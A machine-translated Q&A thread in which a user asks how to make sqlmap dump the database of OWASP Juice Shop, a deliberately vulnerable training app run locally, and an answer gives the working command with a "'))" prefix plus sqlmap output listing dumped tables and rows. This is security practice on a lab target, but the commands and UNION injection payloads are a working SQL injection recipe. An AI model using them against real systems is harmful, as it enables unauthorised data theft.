web-dev-qa-db-ja.com

sqlmapを使用してOWASP Juice Shopスキーマをダンプする方法を教えてください。

sqlmapがOWASPの故意に脆弱な Juice Shop Webアプリケーションからスキーマ情報を悪用し、正常に取得するようには見えません。

私はsqlmapコマンドラインオプションを非常に具体的にして、それを助けるように努めましたが、それでもまだ協力を拒否しています。これは私を最も近くするように見えたコマンドです:

python .\sqlmap.py -u 'http://localhost:3000/rest/product/search?q=' -p 'q' --level=3 --risk=3 --dbms="sqlite" --dump-all --technique U --union-cols 8

(私は--prefix--suffixを試しました。)

これは以下を生成します:

        ___
       __H__
 ___ ___[']_____ ___ ___  {1.3.4.4#dev}
|_ -| . [(]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 15:04:29 /2019-04-11/

[15:04:29] [INFO] setting file for logging HTTP traffic
[15:04:29] [WARNING] provided value for parameter 'q' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[15:04:29] [INFO] testing connection to the target URL
[15:04:29] [INFO] checking if the target is protected by some kind of WAF/IPS
[15:04:29] [WARNING] heuristic (basic) test shows that GET parameter 'q' might not be injectable
[15:04:29] [INFO] testing for SQL injection on GET parameter 'q'
[15:04:29] [INFO] testing 'Generic UNION query (NULL) - 8 to 8 columns (custom)'
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] 
[15:04:41] [INFO] GET parameter 'q' is 'Generic UNION query (NULL) - 8 to 8 columns (custom)' injectable
[15:04:41] [INFO] checking if the injection point on GET parameter 'q' is a false positive
[15:04:42] [WARNING] parameter length constraining mechanism detected (e.g. Suhosin patch). Potential problems in enumeration phase can be expected
GET parameter 'q' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
sqlmap identified the following injection point(s) with a total of 277 HTTP(s) requests:
---
Parameter: q (GET)
    Type: UNION query
    Title: Generic UNION query (NULL) - 8 columns (custom)
    Payload: q=')) UNION ALL SELECT NULL,NULL,NULL,'qxxzq'||'LlkaVrDwPonWdigiXmqckYvJPXMWbHsyWktSKLUe'||'qzxbq',NULL,NULL,NULL,NULL-- BdIT
---
[15:04:46] [INFO] testing SQLite
[15:04:46] [INFO] confirming SQLite
[15:04:46] [INFO] actively fingerprinting SQLite
[15:04:46] [INFO] the back-end DBMS is SQLite
back-end DBMS: SQLite
[15:04:46] [INFO] sqlmap will dump entries of all tables from all databases now
[15:04:46] [INFO] fetching tables for database: 'SQLite_masterdb'
[15:04:46] [WARNING] the SQL query provided does not return any output
[15:04:46] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[15:04:46] [ERROR] unable to retrieve the table names for any database
do you want to use common table existence check? [y/N/q] 
[15:04:51] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 264 times
[15:04:51] [INFO] fetched data logged to text files under 'C:\Users\james.keeler\AppData\Local\sqlmap\output\localhost'

[*] ending @ 15:04:51 /2019-04-11/

'q'パラメータが脆弱であると認識しているのを確認できますが、500エラーを生成しないペイロードを適切に挿入できません。

これは、エラーページに返される脆弱なクエリです。

SELECT * FROM Products WHERE ((name LIKE '%[INJECTION POINT]%' OR description LIKE '%[INJECTION POINT]%') AND deletedAt IS NULL) ORDER BY name

クエリがクラッシュしない場合、有効な応答は次のようになります。

{"status":"success","data":[{"id":1,"name":"Apple Juice (1000ml)","description":"The all-time classic.","price":1.99,"image":"Apple_juice.jpg","createdAt":"2019-04-09 20:42:47.955 +00:00","updatedAt":"2019-04-09 20:42:47.955 +00:00","deletedAt":null},{"id":24,"name":"Apple Pomace","description":"Finest pressings of apples. Allergy disclaimer: Might contain traces of worms. Can be <a href=\"/#recycle\">sent back to us</a> for recycling.","price":0.89,"image":"Apple_pressings.jpg","createdAt":"2019-04-09 20:42:47.956 +00:00","updatedAt":"2019-04-09 20:42:47.956 +00:00","deletedAt":null}]}

また、PyCharmを使用してsqlmapをデバッグして、ロジックをウォークスルーできるようにしました。私はこれに数時間を費やしましたが、so多くのリクエストとキャッシュがあり、私はどうしようもなく失われてしまいました。ユニオン手法を実行すると、無効なSQLが生成されることがわかりました。ペイロードは複数回繰り返されているようです。それがsqlmapであるのか、クエリに2つの注入ポイントがあるのか​​わかりませんでした。

最後に、xml/paylods/union_query.xml構成ファイルでカスタムペイロードを構成してみました。すでにファイルにあるもの以外、本当に良いドキュメントや例は見つかりませんでした。 --test-filterオプションを使用して(おそらく)カスタムペイロードを指定できましたが、次の警告が表示されました:[14:39:29] [WARNING] the SQL query provided does not return any output

何が悪いのですか?

再現手順

Juice Shopを実行するにはいくつかの方法がありますが、最も簡単な方法はDockerを使用することです。次のコマンドで問題を再現できます。

  • docker pull bkimminich/juice-shop
  • docker run --rm -p 3000:3000 bkimminich/juice-shop
  • sqlmap -u 'http://localhost:3000/rest/product/search?q=' -p 'q' --level=3 --risk=3 --dbms="sqlite" --dump-all --technique U --union-cols 8
4
jkeeler

私は同様の問題に遭遇しました。

  • ジュースショップ:v9.0.1
  • sqlmap:1.3.9.13#dev

コマンド:

python2 sqlmap.py -u 'http://localhost:3000/rest/products/search?q=test' -p 'q' --dbms="sqlite" --technique U --prefix "')) " --level 5 --risk 3 --dump-all --no-cast --no-escape --flush

出力:

[17:03:07] [INFO] flushing session file
[17:03:07] [INFO] testing connection to the target URL
[17:03:07] [INFO] checking if the target is protected by some kind of WAF/IPS
[17:03:07] [WARNING] heuristic (basic) test shows that GET parameter 'q' might not be injectable
[17:03:07] [INFO] testing for SQL injection on GET parameter 'q'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] n
[17:03:09] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[17:03:09] [INFO] target URL appears to be UNION injectable with 9 columns
[17:03:10] [INFO] GET parameter 'q' is 'Generic UNION query (NULL) - 1 to 10 columns' injectable
[17:03:10] [INFO] checking if the injection point on GET parameter 'q' is a false positive
[17:03:10] [WARNING] parameter length constraining mechanism detected (e.g. Suhosin patch). Potential problems in enumeration phase can be expected
sqlmap identified the following injection point(s) with a total of 44 HTTP(s) requests:
---
Parameter: q (GET)
    Type: UNION query
    Title: Generic UNION query (NULL) - 9 columns
    Payload: q=test'))  UNION ALL SELECT NULL,NULL,NULL,'qxkzq'||'yOJUHFUiwxhehIgjPHEYCMesiBpVDtukVbUQPyZB'||'qjpzq',NULL,NULL,NULL,NULL,NULL-- Iqfj
---
[17:03:13] [INFO] testing SQLite
[17:03:13] [INFO] confirming SQLite
[17:03:13] [INFO] actively fingerprinting SQLite
[17:03:13] [INFO] the back-end DBMS is SQLite
back-end DBMS: SQLite
[17:03:13] [INFO] sqlmap will dump entries of all tables from all databases now
[17:03:13] [INFO] fetching tables for database: 'SQLite_masterdb'
[17:03:13] [INFO] used SQL query returns 21 entries
[17:03:13] [INFO] retrieved: 'Users'
[17:03:13] [INFO] retrieved: 'sqlite_sequence'
[17:03:13] [INFO] retrieved: 'Addresses'
[17:03:13] [INFO] retrieved: 'Baskets'
[17:03:13] [INFO] retrieved: 'Products'
[17:03:13] [INFO] retrieved: 'BasketItems'
[17:03:13] [INFO] retrieved: 'Captchas'
[17:03:13] [INFO] retrieved: 'Cards'
[17:03:13] [INFO] retrieved: 'Challenges'
[17:03:13] [INFO] retrieved: 'Complaints'
[17:03:13] [INFO] retrieved: 'Deliveries'
[17:03:13] [INFO] retrieved: 'Feedbacks'
[17:03:13] [INFO] retrieved: 'ImageCaptchas'
[17:03:13] [INFO] retrieved: 'Memories'
[17:03:13] [INFO] retrieved: 'PrivacyRequests'
[17:03:14] [INFO] retrieved: 'PurchaseQuantities'
[17:03:14] [INFO] retrieved: 'Quantities'
[17:03:14] [INFO] retrieved: 'Recycles'
[17:03:14] [INFO] retrieved: 'SecurityQuestions'
[17:03:14] [INFO] retrieved: 'SecurityAnswers'
[17:03:14] [INFO] retrieved: 'Wallets'
[17:03:14] [INFO] fetching columns for table 'SecurityQuestions' in database 'SQLite_masterdb'
[17:03:14] [INFO] fetching entries for table 'SecurityQuestions' in database 'SQLite_masterdb'
[17:03:14] [INFO] used SQL query returns 10 entries
[17:03:14] [INFO] retrieved: '2019-09-13 14:25:54.260 +00:00','1','Your eldest siblings middle name?','2019-09-13 14:25:54.260 +00:00'
[17:03:14] [INFO] retrieved: '2019-09-13 14:25:54.261 +00:00','2','Mother's maiden name?','2019-09-13 14:25:54.261 +00:00'
[17:03:14] [INFO] retrieved: '2019-09-13 14:25:54.261 +00:00','3','Mother's birth date? (MM/DD/YY)','2019-09-13 14:25:54.261 +00:00'
[17:03:14] [INFO] retrieved: '2019-09-13 14:25:54.261 +00:00','4','Father's birth date? (MM/DD/YY)','2019-09-13 14:25:54.261 +00:00'
[17:03:14] [INFO] retrieved: '2019-09-13 14:25:54.261 +00:00','5','Maternal grandmother's first name?','2019-09-13 14:25:54.261 +00:00'
[17:03:14] [INFO] retrieved: '2019-09-13 14:25:54.261 +00:00','6','Paternal grandmother's first name?','2019-09-13 14:25:54.261 +00:00'
[17:03:14] [INFO] retrieved: '2019-09-13 14:25:54.262 +00:00','7','Name of your favorite pet?','2019-09-13 14:25:54.262 +00:00'
[17:03:14] [INFO] retrieved: '2019-09-13 14:25:54.262 +00:00','8','Last name of dentist when you were a teenager? (Do not include 'D...
[17:03:14] [INFO] retrieved: '2019-09-13 14:25:54.262 +00:00','9','Your Zip/postal code when you were a teenager?','2019-09-13 14:25...
[17:03:14] [INFO] retrieved: '2019-09-13 14:25:54.262 +00:00','10','Company you first work for as an adult?','2019-09-13 14:25:54.26...
Database: SQLite_masterdb
Table: SecurityQuestions

主な問題は、アプリケーションがペイロードを200文字で切り捨てているため、--no-castおよび--no-escapeを使用する必要があったことです。

大きなテーブルのコンテンツを取得する際にはまだいくつかの問題があり、フルダンプを実行しようとすると警告が表示される可能性があります。

[17:03:16] [WARNING] unable to retrieve the entries for table 'Baskets' in database 'SQLite_masterdb'
[17:03:16] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
2
null